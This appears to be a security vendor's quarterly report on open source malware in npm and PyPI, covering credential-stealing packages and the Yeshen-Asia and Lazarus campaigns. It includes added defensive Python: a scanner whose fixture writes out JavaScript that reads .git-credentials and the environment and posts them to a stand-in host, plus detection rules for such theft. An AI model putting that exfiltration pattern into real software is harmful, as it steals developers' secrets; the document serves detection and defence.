In the second quarter of 2025, Sonatype uncovered 16,279 pieces of open source malware, bringing the total number of malicious packages identified by our automated detection systems to 845,204 and counting. Once again, data exfiltration emerged as the dominant tactic, reinforcing a persistent and growing trend in software supply chain attacks targeting developers and CI/CD environments.
These threats are a form of open source malware — malicious code intentionally published to public repositories like npm and PyPI. Often disguised as useful packages, open source malware is engineered to compromise systems, steal data, or provide backdoor access during development or deployment.
This post is part of our ongoing Open Source Malware Index series, where we report quarterly on malware trends identified by Sonatype's automated systems. If you missed our Q1 2025 edition, we covered a surge in malicious packages targeting developer environments with credential theft and persistent access.
Our Q2 findings show attackers are doubling down on these tactics, using automation, social engineering, and sophisticated obfuscation techniques to target developers and their environments. Clearly, data exfiltration is not going away.
Q2 2025 at a glance
From April 1 through June 30, 2025, Sonatype uncovered 16,279 pieces of open source malware. This number parallels the more than 17,000 malicious packages discovered in Q1 2025 and represents a staggering 188% increase compared to Q2 of last year.
Overall, Sonatype has observed a shift away from crypto miners, code injection malware, and droppers as attackers focus their efforts on data — both exfiltration and corruption.
Key findings from the quarter include:
- Data exfiltration remained the most common threat, accounting for 55% of all packages. Over 4,400 packages were specifically designed to steal secrets, personally identifiable information, credentials, and API tokens.
- Malware targeting data corruption doubled in frequency, making up 3% of total malicious packages — more than 400 unique instances.
- Crypto miners declined slightly, representing 5% of the packages, as attackers shift toward more profitable and persistent attack vectors.
- Sonatype attributed 107 malicious packages to the Lazarus Group, an APT linked to the North Korean government. These packages accounted for over 30,000 known downloads.
What malware is doing: Spotlight on data exfil
Many of the malicious packages uncovered this quarter used advanced techniques for exfiltrating sensitive data.
These include:
- Exfiltrating .git-credentials, AWS secrets, and environment variables.
- Targeting developer systems to harvest credentials used in CI/CD pipelines.
- Using time-delayed payloads and encrypted transmissions to avoid detection.
Why developers are a prime target
Malware attacks are often built with specific targets in mind. In traditional phishing scenarios, the target might be an administrative employee receiving an urgent message to download a file on behalf of a CEO. But in the case of open source malware, developers are the primary targets, and that targeting explains much of the behavior we see in these packages.
According to Sonatype Principal Security Researcher Garrett Calpouzos, "While it's possible a developer's machine could contain proprietary code that a threat actor might want, the odds of finding and monetizing something useful in an automated attack are low. However, developers have something else attackers really want: secrets and keys, often in predictable locations."
"As a result, we continue to see a large volume of malware targeting environment variables, config files, and other common places used by CI/CD tools and cloud services to store sensitive information. Once attackers collect these credentials, they can attempt unauthorized access to cloud accounts, APIs, databases, and internal systems, opening the door to broader compromise and exploitation."
Case in point: A CryptoJS imposter turned crypto-stealer
In April 2025, Sonatype's automated malware detection systems flagged a malicious npm package named crypto-encrypt-ts, which masqueraded as a legitimate revival of the widely used but unmaintained CryptoJS library. Analyzed by Sonatype Security Researcher Jeff Thornhill, and tracked as sonatype-2025-001329, the package quickly gained traction — accumulating nearly 1,928 downloads — before analysis revealed it was stealthily harvesting a range of sensitive information, including crypto wallet details, MongoDB connection strings, and environment variables.
Once installed, crypto-encrypt-ts linked to the Better Stack logging service (formerly Logtail) to exfiltrate stolen data to a remote endpoint under the attacker's control. It selectively targeted wallets with balances over 1,000 units and embedded cron-style persistence using pm2 to run indefinitely. This case illustrates a key Q2 trend: attackers increasingly deploy targeted exfiltration tactics within deceptive, brand-mimicking open source components. Read more in our detailed blog post.
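As an added, defender-side illustration (not Sonatype's tooling and not code from any package named above), the following heuristic pre-install scanner flags the behaviours listed under the data exfil spotlight and seen in the crypto-encrypt-ts case: lifecycle install hooks, reads of .git-credentials and AWS credential files, whole-environment access, outbound requests, long setTimeout delays, and pm2 persistence. The fixture package, rule weights and verdict thresholds are constructed for the example, and the delay evaluator only understands plain products such as 6 * 60 * 60 * 1000.

```python
import json
import math
import re

# Constructed fixture (not a real npm artifact) exhibiting the behaviours the post describes.
SAMPLE_PACKAGE = {
    "package.json": '{"name": "example-pkg", "scripts": {"postinstall": "node setup.js"}}',
    "setup.js": (
        "const fs = require('fs'), os = require('os'), https = require('https');\n"
        "setTimeout(() => {\n"
        "  const creds = fs.readFileSync(os.homedir() + '/.git-credentials', 'utf8');\n"
        "  https.request({ host: 'collector.example.invalid', method: 'POST' })\n"
        "      .end(JSON.stringify({ creds, env: process.env }));\n"
        "}, 6 * 60 * 60 * 1000);\n"
        "require('child_process').exec('pm2 start setup.js');\n"
    ),
}

# (finding, pattern, weight); weights are illustrative, not Sonatype's scoring model.
CONTENT_RULES = [
    ("reads_git_credentials", re.compile(r"\.git-credentials"), 3),
    ("reads_aws_credentials", re.compile(r"\.aws[/\\]credentials|AWS_SECRET_ACCESS_KEY"), 3),
    ("reads_whole_environment", re.compile(r"process\.env(?![.\[\w])"), 3),
    ("outbound_http", re.compile(r"\bhttps?\.request\(|\bfetch\(|\baxios\."), 1),
    ("pm2_persistence", re.compile(r"\bpm2\s+start\b"), 2),
]
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
DELAY_RE = re.compile(r"setTimeout\(.*?\},\s*([\d\s*]+)\)", re.S)

def max_timeout_ms(src: str) -> int:
    # Largest setTimeout delay in ms, evaluating plain products such as 6 * 60 * 60 * 1000.
    return max((math.prod(int(f) for f in e.split("*")) for e in DELAY_RE.findall(src)), default=0)

def scan_package(files: dict) -> dict:
    findings, score = [], 0
    hooks = [h for h in INSTALL_HOOKS if h in json.loads(files.get("package.json", "{}")).get("scripts", {})]
    if hooks:  # code that runs at install time, before anyone imports the package
        findings.append("install_hook:" + ",".join(hooks))
        score += 2
    for name, src in files.items():
        if not name.endswith(".js"):
            continue
        hits = [(f, w) for f, pat, w in CONTENT_RULES if pat.search(src)]
        findings += [f for f, _ in hits]
        score += sum(w for _, w in hits)
        if max_timeout_ms(src) >= 60_000:  # waits a minute or more before acting
            findings.append("delayed_payload")
            score += 2
    verdict = "block" if score >= 6 else "review" if score >= 3 else "allow"
    return {"findings": findings, "score": score, "verdict": verdict}
```

Running `scan_package(SAMPLE_PACKAGE)` returns a "block" verdict with all six findings; a package with no install hook and none of the patterns scores 0 and is allowed.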
Sonatype uncovers more in the Yeshen-Asia malware campaign
In a sprawling six-month campaign dubbed "Yeshen-Asia," a suspected Chinese threat actor deployed over 60 malicious npm packages masquerading as innocuous developer tools. These packages were published through dozens of unique accounts, all using different emails that traced back to the yeshen.asia domain and linked to a common C2 infrastructure. The first wave appeared between December 2024 and April 2025, with early examples like next-refresh-token, serve-static-corell, and openssl-node remaining live on npm well after their initial detection.
While public reporting from Safety and OSV initially identified around 60 packages tied to this campaign, Sonatype discovered an additional 35 packages not included in those disclosures. These were flagged by Sonatype's Release Integrity automated malware detection system and linked through shared infrastructure, including matching IP addresses and email domains associated with @yeshen.asia. Notable additions include packages like jna, lme4, adjksc, and pdfplumber, among many others.
These packages followed the same pattern: Each was published from a distinct author account, each hosted just one malicious component, and all communicated with infrastructure behind Cloudflare-protected yeshen.asia domains. One npm author alone accumulated over 23,000 installs before takedown, demonstrating how stealthy and widespread this campaign became.
Although no novel techniques were observed in this second wave, the level of automation and infrastructure reuse reflects a deliberate, persistent campaign focused on credential theft and secret exfiltration. Sonatype customers were protected from these threats as soon as they were published, and in some cases long before many appeared in public reports.
The Yeshen-Asia campaign is a clear example of how modern attackers blur the lines between legitimate packages and malicious implants, slipping through registry defenses and targeting developers where they are most vulnerable.
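An added example of the infrastructure linking described above, not Sonatype's Release Integrity system: packages are clustered when their publishing accounts share an e-mail domain or their install-time code contacts the same host, and a cluster is flagged when (almost) every account in it published exactly one package. The registry records, domains and IP addresses are constructed placeholders.

```python
from collections import defaultdict

# Constructed registry metadata (not real npm records): package, publishing account e-mail,
# how many packages that account published, and the host its install code contacts.
RECORDS = [
    {"package": "pkg-a", "email": "dev01@mail-one.example", "account_packages": 1, "contact_host": "203.0.113.10"},
    {"package": "pkg-b", "email": "dev02@mail-one.example", "account_packages": 1, "contact_host": "203.0.113.10"},
    {"package": "pkg-c", "email": "dev03@mail-one.example", "account_packages": 1, "contact_host": "203.0.113.11"},
    {"package": "pkg-d", "email": "qa@other.example", "account_packages": 1, "contact_host": "203.0.113.11"},
    {"package": "lib-x", "email": "release@corp.example", "account_packages": 40, "contact_host": "cdn.corp.example"},
    {"package": "lib-y", "email": "release@corp.example", "account_packages": 40, "contact_host": "cdn.corp.example"},
    {"package": "lib-z", "email": "release@corp.example", "account_packages": 40, "contact_host": "cdn.corp.example"},
    {"package": "tool-q", "email": "hobby@mail-two.example", "account_packages": 2, "contact_host": None},
]
# Free-mail providers are shared by millions of accounts and are not a linking signal.
PUBLIC_MAIL_DOMAINS = {"gmail.com", "outlook.com", "yahoo.com", "protonmail.com"}

def cluster_packages(records):
    # Union-find: packages are linked by a shared (non-public) e-mail domain or a shared contact host.
    parent = {r["package"]: r["package"] for r in records}
    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x
    by_key = defaultdict(list)
    for r in records:
        domain = r["email"].rsplit("@", 1)[1].lower()
        if domain not in PUBLIC_MAIL_DOMAINS:
            by_key[("domain", domain)].append(r["package"])
        if r["contact_host"]:
            by_key[("host", r["contact_host"].lower())].append(r["package"])
    for members in by_key.values():
        for pkg in members[1:]:
            parent[find(pkg)] = find(members[0])
    clusters = defaultdict(list)
    for r in records:
        clusters[find(r["package"])].append(r)
    return list(clusters.values())

def suspicious_clusters(records, min_size=3, min_single_ratio=0.8):
    # Flag clusters in which (almost) every account published exactly one package.
    flagged = []
    for members in cluster_packages(records):
        accounts = {r["email"]: r["account_packages"] for r in members}
        singles = sum(1 for n in accounts.values() if n == 1)
        if len(members) >= min_size and singles / len(accounts) >= min_single_ratio:
            flagged.append(sorted(r["package"] for r in members))
    return flagged
```

On the fixture, pkg-a through pkg-d form one cluster (three accounts share a domain, and pkg-d is pulled in through the host it contacts) and are flagged, while the three lib-* packages from a single long-lived publisher account cluster together but are not.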
Lazarus Group packages continue targeting open source registries
In late Q2 2025, Sonatype began detecting a consistent stream of malicious packages attributed to the Lazarus Group, a North Korea-linked advanced persistent threat (APT) known for credential exfiltration and remote code execution (RCE). Over the past three months, Sonatype detected and logged 107 malicious components associated with Lazarus across both npm and PyPI, using deceptive names that mimic configuration or plugin utilities, such as http-parse, node-orm-mongoose, vite-meta-plugin, and mainx. This set of more than 100 packages has over 30,050 total known downloads.
Notably, all observed packages point back to a shared source codebase associated with earlier Lazarus-linked activity, confirming that this is not isolated but part of an ongoing campaign. These packages are designed to steal credentials and execute arbitrary code, enabling attackers to compromise developer machines or CI/CD infrastructure. Although the exact scale of impact remains under investigation, the consistent appearance of these packages underscores the continued abuse of open source ecosystems by nation-state actors.
We are working closely with our internal research team to further analyze the payloads and attribution signals. Sonatype customers remain protected by default thanks to proactive identification and blocking of these malicious components.
Why it matters
Open source components continue to be foundational in modern software development.
But as usage grows, so do the opportunities for malicious actors to exploit trust and automate their attacks.
Q2 data shows a clear trend: attackers are refining exfiltration-focused malware to harvest secrets and credentials, enabling downstream attacks like supply chain breaches or cloud account takeovers.
Sonatype blocks open source malware
From credential-stealing scripts to packages engineered to silently exfiltrate developer secrets, Q2 2025 revealed that data exfiltration remains the most persistent and targeted threat in the open source ecosystem.
Attackers are continuously refining their techniques — leveraging obfuscated payloads, impersonation tactics, and zero-day evasion methods to embed spyware into widely used public registries like npm and PyPI.
While these threats often bypass traditional antivirus tools, organizations using Sonatype Repository Firewall remain protected. Powered by machine learning and real-time behavioral analysis, our automated detection systems block both known and emerging malware before it ever reaches your developers.
In total, Sonatype Repository Firewall helped customers prevent 88,150 open source malware attacks in Q2 2025. The majority (49%) targeted government and public sector entities, followed by 31% aimed at financial services. These numbers reflect the high stakes of securing modern software pipelines, especially in critical and regulated industries.
To secure your software supply chain from development through production, pair Sonatype Repository Firewall with Sonatype Lifecycle for continuous monitoring, policy enforcement, and governance across all your open source dependencies.

Written by Sonatype Security Research Team
Sonatype's Security Research Team is made up of 65 world-class professionals with 500+ years of experience. The Team is focused on bringing real-time, in-depth intelligence and actionable information about open source and third-party vulnerabilities to Sonatype customers.
